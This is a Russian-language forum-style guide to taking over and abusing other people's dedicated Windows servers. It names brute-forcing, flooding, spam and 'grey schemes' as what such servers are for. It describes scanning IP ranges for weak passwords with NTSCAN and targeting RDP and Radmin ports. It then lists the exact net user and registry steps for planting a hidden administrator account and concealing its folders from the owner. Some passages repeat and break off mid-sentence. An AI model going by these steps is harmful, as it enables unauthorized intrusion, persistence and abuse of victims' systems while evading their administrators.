Cтатья создана для всеобщего развития и обновлению\получению новых знаний в этой области. Я не учу вас ничего делать, а лишь преподношу теорию.
Будет полезно для новичков в этом деле или тех, кто хотел бы узнать что-то новое.
Дедики. Что это и с чем его едят?
Дедик - очевидно, пошло от английского слова "dedicated", что с англиского значит выделенный. То есть Dedicated Server - выделенный сервер. Дедики, как их принято называть, на которых имеются довольно мощные сетевые интерфейсы, каналы и довольно не слабая аппаратная конфигурация служат для обработки данных, а также для хранения баз данных или любого другого материала находящегося на них для обслуживания персонала, фирмы или организации.
Как подключиться к дедику?
Подключиться к дедику можно с помошью встроеного в ОС windows утилиты: Подключение к удаленному рабочему столу. Пуск => Программы => Стандартные => Связь => Подключение к удаленному рабочему столу. Можно еще так: Пуск => Выполнить => mstsc. Еще одно утилита для подключение к дедику - это [BL4CK] VNC Viewer: Authentication Bypass. Просто запусти ее и вводи ip адрес дедика. Можно еще Радмином юзать дедик если он установлен на дедике.
На что требуется обращать внимание при выборе дедика?
Канал, Память(RAM), Камень(процессор), ОС. Вот примеры:
Цитата:Intel(R) Pentium(R) 4 CPU 2.80GHz, 3.00 GB of RAM\2003 os\1 gb
Intel(R) Pentium(R) 4 CPU 3.20GHz, 2.00 GB of RAM\2003 os\100 mb
Intel(R) Xeon(TM) CPU 3.06GHz\3.80 GB of RAM\2003 os\100 mb
Для чего нужен дедик?
Ну к примеру для брута, флуда, спама, серых схем.
Где достать дедик?
Покупка.
Взлом сервера.
Раздачи.
Как взломать дедик?
Можно простыми TCP/IP сканерами насканить дедики Значит так, есть такая программа, которую в сети вам найти будет вполне по силам и называется она NTSCAN. Делает она следующее: при выборе определённого диапазона она сканирует сервера на предмет простых паролей (simple passwords). Программа имеет довольно неплохой выбор метода атаки, и вероятность взлома сервером с её помощью очень велика, так как админы часто ставят простые пароли к серверу, особенно на забугорных. Прога работает по принципу брута: посылает запрос на авторизацию на сервере и получает ответ от севера. В случае успешной авторизации выводит список серверов в нижней части программы. Теперь главное выбрать диапазон сканирования и настроить программу для эффективной работы. Сверху мы вписываем диапазон IP серверов, как вы наверно уже поняли. Далее, HostFile - список хостов (я не использовал эту опцию), здесь можно создать файл с конкретными хостами и брутить конкретные хосты. Потоки я оставлял как есть: 50, Timeout - аналогично. ConnectShare - подключение к расшаренным ресурсам. Можно выбирать метод атаки: IPCscan, SMBscan, WMIscan. Далее, "ping from host" - пинговать хосты, то есть проверка на живучесть хоста, перед попыткой атаки, чтобы не брутить в холостую мёртвые хосты. Scan host opened port - сканировать хосты с открытым портом 139, но так же можно и изменить при желании. Speed - скорость работы брута (перебора паролей).Покупка.
Взлом сервера.
Раздачи.
Как взломать дедик?
Какие порты надо сканить?
TCP порты: 3389 - это порт, используемый программой Remote Desktop
Порт 4899, который используется радмином - прогой Remote Administrator.
Есть дедик, хочу добавить нового юзера. Как это реализовать?
Открывай Administrative Tools => Computer Management => находим там вкладку Local Users and Groups => щёлкаем правой кнопкой мыши по вкладке Users => Create new user.
net user имя_пользователя /add
net start (stop) имя_службы
Как замаскировать свое прибывание?
Для начала нужно создать нам свою учётку. Потому что если мы будем сидеть через учётку админа, то это 90% что он нас пропалит! А нам этого не надо! Итак читай внимательно как сделать на чужом дедике свою учётку, и скрыть её! Делать это мы будем через командную строку! Запускаем командную строку (Пуск > Выполнить > cmd.exe) и пишем в ней:
net user (тут пишем логин и пароль учётки которую мы будем создовать! Делаем это через пробел.)
/add net localgroup Administrators (Тут указываем имя которое вы должны были указать в первой строке)
/add net localgroup "Remote Desktop Users" (Тут тоже указываем имя которое указали в строке выше)
/add net accounts /maxpwage:unlimited
Допустим вы хотите создать учётную запись с именем admin, и паролем test. Тогда у вас должно вот что получиться:/add net localgroup "Remote Desktop Users" (Тут тоже указываем имя которое указали в строке выше)
/add net accounts /maxpwage:unlimited
net user admin test /add
net localgroup Administrators admin /add
net localgroup "Remote Desktop Users" admin /add
net accounts /maxpwage:unlimited
Как скрыть себя среди других пользователей?net localgroup Administrators admin /add
net localgroup "Remote Desktop Users" admin /add
net accounts /maxpwage:unlimited
Заходим в реестер (Пуск > Выполнить > regedit.exe) переходим в HKEY_LOCAL_MACHINEHKEY_LOCAL_MACHINESOFTWARE Microsoft Windows NT CurrentVersion Winlogon SpecialAccounts UserList и создаём там новый параметр DWORD (правой кнопкой мыши,новый параметр DWORD) Называем этот параметр именем твоего аккаунта,и присваиваем ему численное значение 0.
Дальше нам нужно скрыть папку с нашим аккаунтом, со всеми подкаталогами, и файлами. Для этого идём в Cocuments and Settings и скрываем там нашу папку. (Правой кнопкой мыши > свойства > ставим галочку на "скрытый" и жмём применить)
Дальше идём в C:WINDOWSsystem32 и создаём папку (название любое) Но вот и всё теперь ты можешь спокойно заходить на дедик под своим логином, и паролем. Теперь после того как мы вошли под своим логином и паролем нужно скрыть папку которую мы сделали. Это делается правой кнопкой мыши.